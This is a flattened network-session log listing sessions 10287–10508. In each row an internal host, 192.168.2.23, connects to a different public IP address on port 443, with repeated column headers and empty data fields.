                                        10287192.168.2.235341871.205.155.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10288192.168.2.234518292.251.70.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10289192.168.2.2335666208.31.160.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10290192.168.2.234644471.85.202.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10291192.168.2.233448447.38.179.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10292192.168.2.235783258.143.207.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10293192.168.2.2342300121.160.94.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10294192.168.2.2340554180.231.231.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10295192.168.2.23560885.30.50.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10296192.168.2.2338078147.190.141.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10297192.168.2.2348370167.65.154.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10298192.168.2.2342080115.187.102.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10299192.168.2.2359992170.59.199.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10300192.168.2.2344486125.19.182.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10301192.168.2.2337622193.229.192.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10302192.168.2.2339394178.21.111.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10303192.168.2.235192037.93.125.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10304192.168.2.2350318178.76.64.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10305192.168.2.2354730144.99.116.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10306192.168.2.2338198154.154.201.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10307192.168.2.2353528209.5.158.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10308192.168.2.2335388166.73.230.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10309192.168.2.2349134205.11.81.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10310192.168.2.2335168189.1.97.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10311192.168.2.2334762223.136.16.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10312192.168.2.2334228217.156.141.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10313192.168.2.2357204202.142.208.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10314192.168.2.2341928169.63.247.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10315192.168.2.2350300136.2.129.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10316192.168.2.2359618193.9.216.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10317192.168.2.2339182197.118.236.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10318192.168.2.235873041.219.244.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10319192.168.2.233342072.170.69.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10320192.168.2.2351934140.159.128.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10321192.168.2.234053057.24.6.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10322192.168.2.234409667.138.6.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10323192.168.2.2345852123.227.207.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10324192.168.2.23608768.172.146.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10325192.168.2.235068892.58.233.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10326192.168.2.2350948157.198.206.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10327192.168.2.2335288175.235.110.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10328192.168.2.233873240.130.168.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10329192.168.2.2345756181.248.65.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10330192.168.2.2339342104.84.174.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10331192.168.2.2360896130.200.172.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10332192.168.2.233362686.217.231.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10333192.168.2.235273048.18.42.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10334192.168.2.2354510128.137.249.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10335192.168.2.2352342192.130.239.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10336192.168.2.2359650200.141.225.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10337192.168.2.235034445.196.106.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10338192.168.2.235468652.173.243.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10339192.168.2.2336318102.112.72.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10340192.168.2.2334798198.37.58.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10341192.168.2.2340498154.200.94.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10342192.168.2.2355208199.234.214.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10343192.168.2.2346434218.82.239.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10344192.168.2.2346530169.167.191.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10345192.168.2.234958859.195.117.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10346192.168.2.2340362208.124.93.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10347192.168.2.233687288.224.91.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10348192.168.2.2349240101.90.29.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10349192.168.2.235315272.119.35.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10350192.168.2.233375077.31.13.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10351192.168.2.2353462172.3.14.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10352192.168.2.2360536126.203.139.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10353192.168.2.234749831.137.61.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10354192.168.2.2360088100.177.5.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10355192.168.2.235559060.61.204.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10356192.168.2.2334788190.83.27.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10357192.168.2.2340760160.29.192.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10358192.168.2.2357484108.109.186.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10359192.168.2.234406876.13.184.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10360192.168.2.233466893.38.11.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10361192.168.2.235449832.238.79.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10362192.168.2.2336464161.132.85.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10363192.168.2.2350134175.225.79.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10364192.168.2.235260676.50.192.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10365192.168.2.234445651.89.132.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10366192.168.2.2338476108.62.89.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10367192.168.2.2346532116.17.125.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10368192.168.2.234450462.29.203.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10369192.168.2.2353694203.216.118.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10370192.168.2.233719871.117.57.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10371192.168.2.2350832140.168.113.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10372192.168.2.2358846146.224.159.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10373192.168.2.2350526126.160.79.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10374192.168.2.2353794117.21.227.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10375192.168.2.233497658.60.26.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10376192.168.2.233630293.109.199.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10377192.168.2.2332990168.77.5.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10378192.168.2.233519634.232.101.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10379192.168.2.234298075.215.91.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10380192.168.2.2350798217.59.142.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10381192.168.2.233319227.216.208.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10382192.168.2.2342842153.63.75.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10383192.168.2.2338552187.26.69.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10384192.168.2.233500075.177.43.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10385192.168.2.2342894185.68.157.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10386192.168.2.2359178122.104.26.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10387192.168.2.2357926142.135.238.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10388192.168.2.2341496213.143.87.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10389192.168.2.2359410168.107.192.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10390192.168.2.2344450209.111.196.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10391192.168.2.2358030136.245.58.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10392192.168.2.233300614.15.145.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10393192.168.2.2347836185.69.74.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10394192.168.2.236038837.156.181.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10395192.168.2.235219647.232.255.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10396192.168.2.235005461.82.243.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10397192.168.2.233727836.165.209.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10398192.168.2.2356180186.249.108.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10399192.168.2.234084039.68.229.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10400192.168.2.234617650.229.196.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10401192.168.2.2358154165.120.11.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10402192.168.2.2340332181.9.251.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10403192.168.2.234221420.89.49.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10404192.168.2.235001646.144.34.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10405192.168.2.233372847.204.177.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10406192.168.2.2359712134.252.163.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10407192.168.2.2351156213.35.97.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10408192.168.2.2343154173.158.221.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10409192.168.2.2357770176.223.187.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10410192.168.2.233329897.216.206.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10411192.168.2.2342252103.245.25.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10412192.168.2.2347418175.4.37.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10413192.168.2.234200651.53.51.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10414192.168.2.235145250.252.50.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10415192.168.2.2348620188.56.116.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10416192.168.2.2353290114.33.199.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10417192.168.2.234051824.214.96.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10418192.168.2.2355680204.109.173.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10419192.168.2.233693096.99.95.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10420192.168.2.2357336144.231.144.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10421192.168.2.2341614153.50.193.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10422192.168.2.2334074126.103.120.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10423192.168.2.234199043.124.40.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10424192.168.2.2333458154.231.146.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10425192.168.2.2336820202.180.6.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10426192.168.2.235561212.21.52.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10427192.168.2.2357038221.78.50.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10428192.168.2.234948476.126.125.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10429192.168.2.2341208148.37.106.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10430192.168.2.233598495.241.195.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10431192.168.2.234495483.5.189.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10432192.168.2.2360478146.252.240.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10433192.168.2.234858283.187.241.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10434192.168.2.234900265.107.218.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10435192.168.2.235535850.155.214.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10436192.168.2.2339678201.154.96.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10437192.168.2.2340802220.117.173.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10438192.168.2.233344886.250.216.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10439192.168.2.2337266151.89.237.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10440192.168.2.235275265.192.46.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10441192.168.2.2360116136.233.67.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10442192.168.2.233551250.31.47.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10443192.168.2.2341650182.110.138.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10444192.168.2.23594384.249.29.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10445192.168.2.2353328191.125.12.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10446192.168.2.235280258.61.168.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10447192.168.2.233424481.34.253.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10448192.168.2.234503084.188.89.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10449192.168.2.234606280.247.133.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10450192.168.2.2342728160.48.174.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10451192.168.2.235406434.75.37.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10452192.168.2.2360102178.206.99.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10453192.168.2.23468661.1.108.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10454192.168.2.2356130160.221.44.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10455192.168.2.23432265.174.166.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10456192.168.2.2350058200.22.136.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10457192.168.2.234051476.197.89.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10458192.168.2.234637032.3.194.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10459192.168.2.2341222209.197.161.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10460192.168.2.2338518115.223.220.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10461192.168.2.2341954213.3.164.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10462192.168.2.233496423.220.209.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10463192.168.2.234978459.201.100.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10464192.168.2.23574229.3.91.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10465192.168.2.235638832.65.190.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10466192.168.2.2335338100.20.222.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10467192.168.2.234842023.119.163.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10468192.168.2.2347686162.80.201.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10469192.168.2.2336098200.36.112.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10470192.168.2.2352884195.4.151.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10471192.168.2.235440697.35.153.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10472192.168.2.233505871.82.207.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10473192.168.2.235633896.136.210.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10474192.168.2.2335228217.254.225.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10475192.168.2.234088064.170.175.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10476192.168.2.2342888154.254.82.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10477192.168.2.23446709.160.79.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10478192.168.2.2344200188.213.167.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10479192.168.2.2339254100.189.154.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10480192.168.2.2352784185.18.236.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10481192.168.2.2352838136.22.39.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10482192.168.2.236002239.162.147.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10483192.168.2.2333484152.192.24.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10484192.168.2.233915034.224.108.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10485192.168.2.234418068.205.196.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10486192.168.2.2335088145.4.105.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10487192.168.2.2348096174.202.16.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10488192.168.2.2352174208.140.55.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10489192.168.2.234868493.133.241.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10490192.168.2.235986286.1.24.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10491192.168.2.233968479.46.107.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10492192.168.2.2341278140.161.181.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10493192.168.2.23581444.133.13.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10494192.168.2.2344298158.169.240.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10495192.168.2.234908085.191.179.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10496192.168.2.234560447.203.177.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10497192.168.2.2347306193.164.115.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10498192.168.2.2355330170.145.25.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10499192.168.2.2333362177.243.31.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10500192.168.2.235824423.206.186.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10501192.168.2.235534454.0.224.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10502192.168.2.2336488195.84.205.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10503192.168.2.2336628210.149.24.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10504192.168.2.233772671.127.156.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10505192.168.2.234869240.216.145.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10506192.168.2.2351376207.251.71.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10507192.168.2.2355040118.111.138.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10508192.168.2.2336998126.199.127.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
